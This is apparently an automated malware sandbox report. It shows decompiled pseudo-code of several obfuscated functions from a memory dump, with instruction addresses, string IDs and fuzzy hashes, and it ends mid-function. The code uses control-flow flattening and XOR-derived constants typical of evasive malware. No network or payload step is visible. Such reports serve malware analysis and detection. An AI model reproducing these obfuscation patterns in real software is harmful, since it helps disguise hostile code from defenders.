                                                                                                                                                                                                                    				_v32 = _v32 + 0xa8bb;
                                                                                                                                                                                                                    				_v32 = _v32 / _t137;
                                                                                                                                                                                                                    				_v32 = _v32 ^ 0x0002719f;
                                                                                                                                                                                                                    				_v52 = 0x283024;
                                                                                                                                                                                                                    				_v52 = _v52 | 0xffba3fdf;
                                                                                                                                                                                                                    				_t138 = 0x2f;
                                                                                                                                                                                                                    				_v52 = _v52 / _t138;
                                                                                                                                                                                                                    				_v52 = _v52 ^ 0x0577d0c6;
                                                                                                                                                                                                                    				_v24 = 0xdf82f;
                                                                                                                                                                                                                    				_v24 = _v24 >> 6;
                                                                                                                                                                                                                    				_v24 = _v24 ^ 0x000c5c23;
                                                                                                                                                                                                                    				_v44 = 0x2d78e1;
                                                                                                                                                                                                                    				_v44 = _v44 | 0xafac4d37;
                                                                                                                                                                                                                    				_v44 = _v44 * 0x5c;
                                                                                                                                                                                                                    				_v44 = _v44 << 5;
                                                                                                                                                                                                                    				_v44 = _v44 ^ 0x4b21569e;
                                                                                                                                                                                                                    				_v48 = 0x3e51a8;
                                                                                                                                                                                                                    				_v48 = _v48 + 0x6e5;
                                                                                                                                                                                                                    				_v48 = _v48 + 0x6f22;
                                                                                                                                                                                                                    				_v48 = _v48 >> 9;
                                                                                                                                                                                                                    				_v48 = _v48 ^ 0x000fb99c;
                                                                                                                                                                                                                    				_v28 = 0x12b12b;
                                                                                                                                                                                                                    				_v28 = _v28 ^ 0x9dbac4cb;
                                                                                                                                                                                                                    				_v28 = _v28 + 0xffffa268;
                                                                                                                                                                                                                    				_v28 = _v28 ^ 0x9daedb64;
                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                    					_t157 =  *_t156;
                                                                                                                                                                                                                    					if(_t157 == 0) {
                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					if( *((intOrPtr*)(_t157 + 0x2c)) == 0) {
                                                                                                                                                                                                                    						L4:
                                                                                                                                                                                                                    						 *_t156 =  *((intOrPtr*)(_t157 + 0x10));
                                                                                                                                                                                                                    						_t130 = E00A76A6B(_t157, _v24, _v44, _v48, _v28);
                                                                                                                                                                                                                    						_t159 =  &(_t159[3]);
                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                    						_t130 = E00A81DCF( *((intOrPtr*)(_t157 + 4)), _t134, _v20, _v40);
                                                                                                                                                                                                                    						if(_t130 != _v36) {
                                                                                                                                                                                                                    							_t118 = _t157 + 0x10; // 0x20c25e
                                                                                                                                                                                                                    							_t156 = _t118;
                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                    							 *((intOrPtr*)(_t157 + 0x18))( *((intOrPtr*)(_t157 + 0x2c)), 0, 0);
                                                                                                                                                                                                                    							E00A74013(_v28, _v68,  *((intOrPtr*)(_t157 + 0x2c)));
                                                                                                                                                                                                                    							E00A6E2BD( *((intOrPtr*)(_t157 + 4)), _v24, _v44, _v64);
                                                                                                                                                                                                                    							_t159 =  &(_t159[3]);
                                                                                                                                                                                                                    							goto L4;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                    				return _t130;
                                                                                                                                                                                                                    			}



























                                                                                                                                                                                                                    0x00a62756
                                                                                                                                                                                                                    0x00a62759
                                                                                                                                                                                                                    0x00a6276f
                                                                                                                                                                                                                    0x00a62773
                                                                                                                                                                                                                    0x00a62775
                                                                                                                                                                                                                    0x00a6277d
                                                                                                                                                                                                                    0x00a62786
                                                                                                                                                                                                                    0x00a6278b
                                                                                                                                                                                                                    0x00a62791
                                                                                                                                                                                                                    0x00a62799
                                                                                                                                                                                                                    0x00a627a1
                                                                                                                                                                                                                    0x00a627a9
                                                                                                                                                                                                                    0x00a627b1
                                                                                                                                                                                                                    0x00a627b9
                                                                                                                                                                                                                    0x00a627c6
                                                                                                                                                                                                                    0x00a627c9
                                                                                                                                                                                                                    0x00a627cd
                                                                                                                                                                                                                    0x00a627d5
                                                                                                                                                                                                                    0x00a627dd
                                                                                                                                                                                                                    0x00a627e5
                                                                                                                                                                                                                    0x00a627ed
                                                                                                                                                                                                                    0x00a627f5
                                                                                                                                                                                                                    0x00a627fd
                                                                                                                                                                                                                    0x00a62805
                                                                                                                                                                                                                    0x00a6280d
                                                                                                                                                                                                                    0x00a62812
                                                                                                                                                                                                                    0x00a6281a
                                                                                                                                                                                                                    0x00a62827
                                                                                                                                                                                                                    0x00a6282b
                                                                                                                                                                                                                    0x00a62833
                                                                                                                                                                                                                    0x00a6283b
                                                                                                                                                                                                                    0x00a6284b
                                                                                                                                                                                                                    0x00a6284f
                                                                                                                                                                                                                    0x00a62857
                                                                                                                                                                                                                    0x00a6285f
                                                                                                                                                                                                                    0x00a6286b
                                                                                                                                                                                                                    0x00a6286e
                                                                                                                                                                                                                    0x00a62872
                                                                                                                                                                                                                    0x00a6287a
                                                                                                                                                                                                                    0x00a6288a
                                                                                                                                                                                                                    0x00a6288f
                                                                                                                                                                                                                    0x00a62897
                                                                                                                                                                                                                    0x00a6289f
                                                                                                                                                                                                                    0x00a628ac
                                                                                                                                                                                                                    0x00a628b0
                                                                                                                                                                                                                    0x00a628b5
                                                                                                                                                                                                                    0x00a628bd
                                                                                                                                                                                                                    0x00a628c5
                                                                                                                                                                                                                    0x00a628cd
                                                                                                                                                                                                                    0x00a628d5
                                                                                                                                                                                                                    0x00a628da
                                                                                                                                                                                                                    0x00a628e2
                                                                                                                                                                                                                    0x00a628ea
                                                                                                                                                                                                                    0x00a628f2
                                                                                                                                                                                                                    0x00a628fa
                                                                                                                                                                                                                    0x00a62971
                                                                                                                                                                                                                    0x00a62971
                                                                                                                                                                                                                    0x00a62975
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a62907
                                                                                                                                                                                                                    0x00a62952
                                                                                                                                                                                                                    0x00a6295f
                                                                                                                                                                                                                    0x00a62969
                                                                                                                                                                                                                    0x00a6296e
                                                                                                                                                                                                                    0x00a62909
                                                                                                                                                                                                                    0x00a62916
                                                                                                                                                                                                                    0x00a62921
                                                                                                                                                                                                                    0x00a6297f
                                                                                                                                                                                                                    0x00a6297f
                                                                                                                                                                                                                    0x00a62923
                                                                                                                                                                                                                    0x00a62928
                                                                                                                                                                                                                    0x00a62936
                                                                                                                                                                                                                    0x00a6294a
                                                                                                                                                                                                                    0x00a6294f
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6294f
                                                                                                                                                                                                                    0x00a62921
                                                                                                                                                                                                                    0x00a62907
                                                                                                                                                                                                                    0x00a6297e

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: "o$$0($x-
                                                                                                                                                                                                                    • API String ID: 0-2966437471
                                                                                                                                                                                                                    • Opcode ID: 56e86a202d0adf0a546f2724610e2f4dbb1fdd424ecd1d4a87b407e419b43039
                                                                                                                                                                                                                    • Instruction ID: 68495b9021eab3a6bb861457c0f17372ef92ce235ca36e5b3956ff67e33e67e2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 56e86a202d0adf0a546f2724610e2f4dbb1fdd424ecd1d4a87b407e419b43039
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 335130B15083019FC354CF22D98941BBBF1FBD8758F508A1DF599A6260D3B1DA1ACF86
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                                                                                                    			E00A770D1(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                    				char _v28;
                                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                                    				intOrPtr _v36;
                                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                                                    				signed int _v52;
                                                                                                                                                                                                                    				signed int _v56;
                                                                                                                                                                                                                    				signed int _v60;
                                                                                                                                                                                                                    				signed int _v64;
                                                                                                                                                                                                                    				signed int _v68;
                                                                                                                                                                                                                    				signed int _v72;
                                                                                                                                                                                                                    				signed int _v76;
                                                                                                                                                                                                                    				void* _t82;
                                                                                                                                                                                                                    				void* _t95;
                                                                                                                                                                                                                    				intOrPtr _t108;
                                                                                                                                                                                                                    				signed int* _t111;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_push(_a16);
                                                                                                                                                                                                                    				_t107 = _a4;
                                                                                                                                                                                                                    				_push(_a12);
                                                                                                                                                                                                                    				_push(_a8);
                                                                                                                                                                                                                    				_push(_a4);
                                                                                                                                                                                                                    				_push(__edx);
                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                    				E00A7C6D8(_t82);
                                                                                                                                                                                                                    				_v40 = 0xf6e1cf;
                                                                                                                                                                                                                    				_t108 = 0;
                                                                                                                                                                                                                    				_v36 = 0;
                                                                                                                                                                                                                    				_t111 =  &(( &_v76)[6]);
                                                                                                                                                                                                                    				_v32 = 0;
                                                                                                                                                                                                                    				_t95 = 0x4da27bb;
                                                                                                                                                                                                                    				_v60 = 0x8f0e98;
                                                                                                                                                                                                                    				_v60 = _v60 + 0xda58;
                                                                                                                                                                                                                    				_v60 = _v60 << 4;
                                                                                                                                                                                                                    				_v60 = _v60 ^ 0x08ff49ae;
                                                                                                                                                                                                                    				_v72 = 0xa9936e;
                                                                                                                                                                                                                    				_v72 = _v72 >> 0xf;
                                                                                                                                                                                                                    				_v72 = _v72 + 0x86bf;
                                                                                                                                                                                                                    				_v72 = _v72 * 0x3f;
                                                                                                                                                                                                                    				_v72 = _v72 ^ 0x0022eb5c;
                                                                                                                                                                                                                    				_v56 = 0x33be10;
                                                                                                                                                                                                                    				_v56 = _v56 << 7;
                                                                                                                                                                                                                    				_v56 = _v56 ^ 0x19d02e0d;
                                                                                                                                                                                                                    				_v76 = 0x211bd7;
                                                                                                                                                                                                                    				_v76 = _v76 + 0xffffc90d;
                                                                                                                                                                                                                    				_v76 = _v76 << 5;
                                                                                                                                                                                                                    				_v76 = _v76 >> 0xf;
                                                                                                                                                                                                                    				_v76 = _v76 ^ 0x000ddf36;
                                                                                                                                                                                                                    				_v64 = 0x878656;
                                                                                                                                                                                                                    				_v64 = _v64 << 7;
                                                                                                                                                                                                                    				_v64 = _v64 ^ 0x1354d90c;
                                                                                                                                                                                                                    				_v64 = _v64 ^ 0x5097d6db;
                                                                                                                                                                                                                    				_v68 = 0x66ecbe;
                                                                                                                                                                                                                    				_v68 = _v68 + 0xffff82df;
                                                                                                                                                                                                                    				_v68 = _v68 | 0x2339e0bb;
                                                                                                                                                                                                                    				_v68 = _v68 ^ 0x237f8584;
                                                                                                                                                                                                                    				_v44 = 0x3ab468;
                                                                                                                                                                                                                    				_v44 = _v44 << 0xe;
                                                                                                                                                                                                                    				_v44 = _v44 ^ 0xad13562d;
                                                                                                                                                                                                                    				_v48 = 0x6d384d;
                                                                                                                                                                                                                    				_v48 = _v48 + 0x7dd5;
                                                                                                                                                                                                                    				_v48 = _v48 ^ 0x0060c83e;
                                                                                                                                                                                                                    				_v52 = 0x60d4b4;
                                                                                                                                                                                                                    				_v52 = _v52 + 0xffffa4c0;
                                                                                                                                                                                                                    				_v52 = _v52 ^ 0x006dfa7c;
                                                                                                                                                                                                                    				while(_t95 != 0x4da27bb) {
                                                                                                                                                                                                                    					if(_t95 == 0xae2e84d) {
                                                                                                                                                                                                                    						__eflags = E00A7223A(_v44,  &_v28, __eflags, _t107 + 0x2c, _v48, _v52);
                                                                                                                                                                                                                    						_t108 =  !=  ? 1 : _t108;
                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                    						if(_t95 == 0xbb2c4d7) {
                                                                                                                                                                                                                    							E00A773B3(_v60, _v72,  &_v28, _a12, _v56, _v76);
                                                                                                                                                                                                                    							_t111 =  &(_t111[4]);
                                                                                                                                                                                                                    							_t95 = 0xcf1ab60;
                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                    							if(_t95 != 0xcf1ab60) {
                                                                                                                                                                                                                    								L9:
                                                                                                                                                                                                                    								__eflags = _t95 - 0x4b37d84;
                                                                                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                    								if(E00A629F1(_v64, _v68,  &_v28, _t107 + 0x24) != 0) {
                                                                                                                                                                                                                    									_t95 = 0xae2e84d;
                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					return _t108;
                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                    				_t95 = 0xbb2c4d7;
                                                                                                                                                                                                                    				goto L9;
                                                                                                                                                                                                                    			}




















                                                                                                                                                                                                                    0x00a770d8
                                                                                                                                                                                                                    0x00a770dc
                                                                                                                                                                                                                    0x00a770e0
                                                                                                                                                                                                                    0x00a770e4
                                                                                                                                                                                                                    0x00a770e8
                                                                                                                                                                                                                    0x00a770e9
                                                                                                                                                                                                                    0x00a770ea
                                                                                                                                                                                                                    0x00a770eb
                                                                                                                                                                                                                    0x00a770f0
                                                                                                                                                                                                                    0x00a770f8
                                                                                                                                                                                                                    0x00a770fa
                                                                                                                                                                                                                    0x00a770fe
                                                                                                                                                                                                                    0x00a77101
                                                                                                                                                                                                                    0x00a77105
                                                                                                                                                                                                                    0x00a7710a
                                                                                                                                                                                                                    0x00a77117
                                                                                                                                                                                                                    0x00a77124
                                                                                                                                                                                                                    0x00a77129
                                                                                                                                                                                                                    0x00a77131
                                                                                                                                                                                                                    0x00a77139
                                                                                                                                                                                                                    0x00a7713e
                                                                                                                                                                                                                    0x00a7714b
                                                                                                                                                                                                                    0x00a7714f
                                                                                                                                                                                                                    0x00a77157
                                                                                                                                                                                                                    0x00a7715f
                                                                                                                                                                                                                    0x00a77164
                                                                                                                                                                                                                    0x00a7716c
                                                                                                                                                                                                                    0x00a77174
                                                                                                                                                                                                                    0x00a7717c
                                                                                                                                                                                                                    0x00a77181
                                                                                                                                                                                                                    0x00a77186
                                                                                                                                                                                                                    0x00a7718e
                                                                                                                                                                                                                    0x00a77196
                                                                                                                                                                                                                    0x00a7719b
                                                                                                                                                                                                                    0x00a771a3
                                                                                                                                                                                                                    0x00a771ab
                                                                                                                                                                                                                    0x00a771b3
                                                                                                                                                                                                                    0x00a771bb
                                                                                                                                                                                                                    0x00a771c3
                                                                                                                                                                                                                    0x00a771cb
                                                                                                                                                                                                                    0x00a771d3
                                                                                                                                                                                                                    0x00a771d8
                                                                                                                                                                                                                    0x00a771e0
                                                                                                                                                                                                                    0x00a771e8
                                                                                                                                                                                                                    0x00a771f0
                                                                                                                                                                                                                    0x00a771f8
                                                                                                                                                                                                                    0x00a77200
                                                                                                                                                                                                                    0x00a77208
                                                                                                                                                                                                                    0x00a77210
                                                                                                                                                                                                                    0x00a7721a
                                                                                                                                                                                                                    0x00a7729b
                                                                                                                                                                                                                    0x00a7729d
                                                                                                                                                                                                                    0x00a7721c
                                                                                                                                                                                                                    0x00a7721e
                                                                                                                                                                                                                    0x00a77261
                                                                                                                                                                                                                    0x00a77266
                                                                                                                                                                                                                    0x00a77269
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a77220
                                                                                                                                                                                                                    0x00a77226
                                                                                                                                                                                                                    0x00a77272
                                                                                                                                                                                                                    0x00a77272
                                                                                                                                                                                                                    0x00a77278
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7727a
                                                                                                                                                                                                                    0x00a77228
                                                                                                                                                                                                                    0x00a77242
                                                                                                                                                                                                                    0x00a77244
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a77244
                                                                                                                                                                                                                    0x00a77242
                                                                                                                                                                                                                    0x00a77226
                                                                                                                                                                                                                    0x00a7721e
                                                                                                                                                                                                                    0x00a772a9
                                                                                                                                                                                                                    0x00a772a9
                                                                                                                                                                                                                    0x00a77270
                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: M8m$M$\"
                                                                                                                                                                                                                    • API String ID: 0-870220043
                                                                                                                                                                                                                    • Opcode ID: 825b7a2759756805f9029c767024e37d58dc5a081692880d047a6b017bcbd523
                                                                                                                                                                                                                    • Instruction ID: dc4effaa370ac0d8390fbaf025ba998761c65b59534da4edd2fba502c2c21ba2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 825b7a2759756805f9029c767024e37d58dc5a081692880d047a6b017bcbd523
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A4123725083429FCB58CF61C88945FBBF5FB88758F108A1DF6AA56221D371DA09CB82
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                                                                                                    			E00A676EE(void* __ecx) {
                                                                                                                                                                                                                    				intOrPtr _v4;
                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                    				unsigned int _v24;
                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                    				signed int _v36;
                                                                                                                                                                                                                    				signed int _v40;
                                                                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                                                                    				void* _t67;
                                                                                                                                                                                                                    				void* _t71;
                                                                                                                                                                                                                    				void* _t72;
                                                                                                                                                                                                                    				void* _t74;
                                                                                                                                                                                                                    				signed int _t76;
                                                                                                                                                                                                                    				intOrPtr _t83;
                                                                                                                                                                                                                    				void* _t84;
                                                                                                                                                                                                                    				signed int* _t86;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t86 =  &_v44;
                                                                                                                                                                                                                    				_v16 = 0x9fd464;
                                                                                                                                                                                                                    				_v12 = 0x454359;
                                                                                                                                                                                                                    				_v8 = 0x1f66e2;
                                                                                                                                                                                                                    				_t83 = 0;
                                                                                                                                                                                                                    				_t74 = __ecx;
                                                                                                                                                                                                                    				_v4 = 0;
                                                                                                                                                                                                                    				_t84 = 0x60f0cd4;
                                                                                                                                                                                                                    				_v24 = 0x930be7;
                                                                                                                                                                                                                    				_v24 = _v24 >> 4;
                                                                                                                                                                                                                    				_v24 = _v24 ^ 0x000b4a90;
                                                                                                                                                                                                                    				_v36 = 0xc05754;
                                                                                                                                                                                                                    				_v36 = _v36 ^ 0xb6e9b483;
                                                                                                                                                                                                                    				_v36 = _v36 ^ 0x781958b5;
                                                                                                                                                                                                                    				_v36 = _v36 ^ 0xce3642ed;
                                                                                                                                                                                                                    				_v28 = 0x936663;
                                                                                                                                                                                                                    				_v28 = _v28 + 0xfffff269;
                                                                                                                                                                                                                    				_v28 = _v28 ^ 0x00991ce7;
                                                                                                                                                                                                                    				_v40 = 0x759c52;
                                                                                                                                                                                                                    				_v40 = _v40 ^ 0xe7cf24f1;
                                                                                                                                                                                                                    				_v40 = _v40 >> 0xb;
                                                                                                                                                                                                                    				_v40 = _v40 | 0xf07e9ddb;
                                                                                                                                                                                                                    				_v40 = _v40 ^ 0xf07adfef;
                                                                                                                                                                                                                    				_v44 = 0x79e952;
                                                                                                                                                                                                                    				_v44 = _v44 + 0x73c8;
                                                                                                                                                                                                                    				_v44 = _v44 ^ 0xe3e8ff8b;
                                                                                                                                                                                                                    				_v44 = _v44 ^ 0x9712a642;
                                                                                                                                                                                                                    				_v44 = _v44 ^ 0x7482e4b3;
                                                                                                                                                                                                                    				_v20 = 0x188ff1;
                                                                                                                                                                                                                    				_v20 = _v20 + 0xfeb3;
                                                                                                                                                                                                                    				_v20 = _v20 ^ 0x001c34f3;
                                                                                                                                                                                                                    				_v32 = 0xb4e69c;
                                                                                                                                                                                                                    				_t76 = 6;
                                                                                                                                                                                                                    				_v32 = _v32 / _t76;
                                                                                                                                                                                                                    				_v32 = _v32 + 0xffffe039;
                                                                                                                                                                                                                    				_v32 = _v32 ^ 0x00178b9a;
                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                    					while(_t84 != 0x49ced3a) {
                                                                                                                                                                                                                    						if(_t84 == 0x60f0cd4) {
                                                                                                                                                                                                                    							_t84 = 0xa7c5a55;
                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                    							if(_t84 == 0xa7c5a55) {
                                                                                                                                                                                                                    								_push(_t76);
                                                                                                                                                                                                                    								_push(_t76);
                                                                                                                                                                                                                    								_t71 = E00A7102D();
                                                                                                                                                                                                                    								_t86 =  &(_t86[2]);
                                                                                                                                                                                                                    								_t84 = 0xe45588f;
                                                                                                                                                                                                                    								_t83 = _t83 + _t71;
                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                    								if(_t84 == 0xe45588f) {
                                                                                                                                                                                                                    									_t72 = E00A76CD3(_v40, _t74 + 0x3c, _v44);
                                                                                                                                                                                                                    									_pop(_t76);
                                                                                                                                                                                                                    									_t83 = _t83 + _t72;
                                                                                                                                                                                                                    									_t84 = 0x49ced3a;
                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						goto L9;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					_t67 = E00A76CD3(_v20, _t74 + 0x1c, _v32);
                                                                                                                                                                                                                    					_pop(_t76);
                                                                                                                                                                                                                    					_t83 = _t83 + _t67;
                                                                                                                                                                                                                    					_t84 = 0x8ee1c4f;
                                                                                                                                                                                                                    					L9:
                                                                                                                                                                                                                    				} while (_t84 != 0x8ee1c4f);
                                                                                                                                                                                                                    				return _t83;
                                                                                                                                                                                                                    			}






















                                                                                                                                                                                                                    0x00a676ee
                                                                                                                                                                                                                    0x00a676f1
                                                                                                                                                                                                                    0x00a676fb
                                                                                                                                                                                                                    0x00a67703
                                                                                                                                                                                                                    0x00a6770f
                                                                                                                                                                                                                    0x00a67711
                                                                                                                                                                                                                    0x00a67713
                                                                                                                                                                                                                    0x00a67717
                                                                                                                                                                                                                    0x00a6771c
                                                                                                                                                                                                                    0x00a67729
                                                                                                                                                                                                                    0x00a6772e
                                                                                                                                                                                                                    0x00a67736
                                                                                                                                                                                                                    0x00a6773e
                                                                                                                                                                                                                    0x00a67746
                                                                                                                                                                                                                    0x00a6774e
                                                                                                                                                                                                                    0x00a67756
                                                                                                                                                                                                                    0x00a6775e
                                                                                                                                                                                                                    0x00a67766
                                                                                                                                                                                                                    0x00a6776e
                                                                                                                                                                                                                    0x00a67776
                                                                                                                                                                                                                    0x00a6777e
                                                                                                                                                                                                                    0x00a67783
                                                                                                                                                                                                                    0x00a6778b
                                                                                                                                                                                                                    0x00a67793
                                                                                                                                                                                                                    0x00a6779b
                                                                                                                                                                                                                    0x00a677a3
                                                                                                                                                                                                                    0x00a677ab
                                                                                                                                                                                                                    0x00a677b3
                                                                                                                                                                                                                    0x00a677bb
                                                                                                                                                                                                                    0x00a677c3
                                                                                                                                                                                                                    0x00a677cb
                                                                                                                                                                                                                    0x00a677d3
                                                                                                                                                                                                                    0x00a677e1
                                                                                                                                                                                                                    0x00a677e4
                                                                                                                                                                                                                    0x00a677e8
                                                                                                                                                                                                                    0x00a677f0
                                                                                                                                                                                                                    0x00a677f8
                                                                                                                                                                                                                    0x00a677f8
                                                                                                                                                                                                                    0x00a67806
                                                                                                                                                                                                                    0x00a6784d
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a67808
                                                                                                                                                                                                                    0x00a6780a
                                                                                                                                                                                                                    0x00a6783a
                                                                                                                                                                                                                    0x00a6783b
                                                                                                                                                                                                                    0x00a6783c
                                                                                                                                                                                                                    0x00a67841
                                                                                                                                                                                                                    0x00a67844
                                                                                                                                                                                                                    0x00a67849
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6780c
                                                                                                                                                                                                                    0x00a67812
                                                                                                                                                                                                                    0x00a6781f
                                                                                                                                                                                                                    0x00a67824
                                                                                                                                                                                                                    0x00a67825
                                                                                                                                                                                                                    0x00a67827
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a67827
                                                                                                                                                                                                                    0x00a67812
                                                                                                                                                                                                                    0x00a6780a
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a67806
                                                                                                                                                                                                                    0x00a6785c
                                                                                                                                                                                                                    0x00a67861
                                                                                                                                                                                                                    0x00a67862
                                                                                                                                                                                                                    0x00a67864
                                                                                                                                                                                                                    0x00a67869
                                                                                                                                                                                                                    0x00a67869
                                                                                                                                                                                                                    0x00a6787a

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: Ry$UZ|$YCE
                                                                                                                                                                                                                    • API String ID: 0-3841969832
                                                                                                                                                                                                                    • Opcode ID: 1182e093485b608483bb14a2bb92f8119b73b135b3ff2845597c5c577262f34d
                                                                                                                                                                                                                    • Instruction ID: 8bd88bdc7cc281a3ef343a115f84167d1c9596a8369cf702957bcdc88a5b6a6c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1182e093485b608483bb14a2bb92f8119b73b135b3ff2845597c5c577262f34d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0F316B7290C3428FC358CF25E54945FBBE1BBD8358F104A5DF4AAA6221D3B48A49CF96
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                                                                                    			E00A7AAF3(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                    				signed int _v4;
                                                                                                                                                                                                                    				void* _t74;
                                                                                                                                                                                                                    				signed int _t87;
                                                                                                                                                                                                                    				signed int _t89;
                                                                                                                                                                                                                    				signed int _t92;
                                                                                                                                                                                                                    				signed int _t93;
                                                                                                                                                                                                                    				signed int _t104;
                                                                                                                                                                                                                    				signed int _t107;
                                                                                                                                                                                                                    				signed short* _t109;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_push(_a12);
                                                                                                                                                                                                                    				_t109 = _a4;
                                                                                                                                                                                                                    				_push(_a8);
                                                                                                                                                                                                                    				_push(_t109);
                                                                                                                                                                                                                    				E00A7C6D8(_t74);
                                                                                                                                                                                                                    				_a4 = 0x419dbd;
                                                                                                                                                                                                                    				_a4 = _a4 ^ 0xd7b0c2a7;
                                                                                                                                                                                                                    				_t92 = 0x76;
                                                                                                                                                                                                                    				_a4 = _a4 / _t92;
                                                                                                                                                                                                                    				_a4 = _a4 ^ 0x4a2def6a;
                                                                                                                                                                                                                    				_a4 = _a4 ^ 0x4bf9931d;
                                                                                                                                                                                                                    				_v4 = 0x394551;
                                                                                                                                                                                                                    				_v4 = _v4 ^ 0xacdc4730;
                                                                                                                                                                                                                    				_t93 = 0xe;
                                                                                                                                                                                                                    				_v4 = _v4 / _t93;
                                                                                                                                                                                                                    				_v4 = _v4 * 0xb;
                                                                                                                                                                                                                    				_v4 = _v4 ^ 0x87d881df;
                                                                                                                                                                                                                    				_v4 = 0xe24417;
                                                                                                                                                                                                                    				_v4 = _v4 >> 8;
                                                                                                                                                                                                                    				_v4 = _v4 * 0x4d;
                                                                                                                                                                                                                    				_v4 = _v4 << 4;
                                                                                                                                                                                                                    				_v4 = _v4 ^ 0x0440e750;
                                                                                                                                                                                                                    				if( *_t109 != 0) {
                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                    						_t89 = _a4;
                                                                                                                                                                                                                    						_v4 = 0x394551;
                                                                                                                                                                                                                    						_v4 = _v4 ^ 0xacdc4730;
                                                                                                                                                                                                                    						_v4 = _v4 / _t93;
                                                                                                                                                                                                                    						_v4 = _v4 * 0xb;
                                                                                                                                                                                                                    						_v4 = _v4 ^ 0x87d881df;
                                                                                                                                                                                                                    						_v4 = 0xe24417;
                                                                                                                                                                                                                    						_v4 = _v4 >> 8;
                                                                                                                                                                                                                    						_t104 = _a4 << _v4;
                                                                                                                                                                                                                    						_v4 = _v4 * 0x4d;
                                                                                                                                                                                                                    						_v4 = _v4 << 4;
                                                                                                                                                                                                                    						_v4 = _v4 ^ 0x0440e750;
                                                                                                                                                                                                                    						_t87 =  *_t109 & 0x0000ffff;
                                                                                                                                                                                                                    						_t107 = _a4 << _v4;
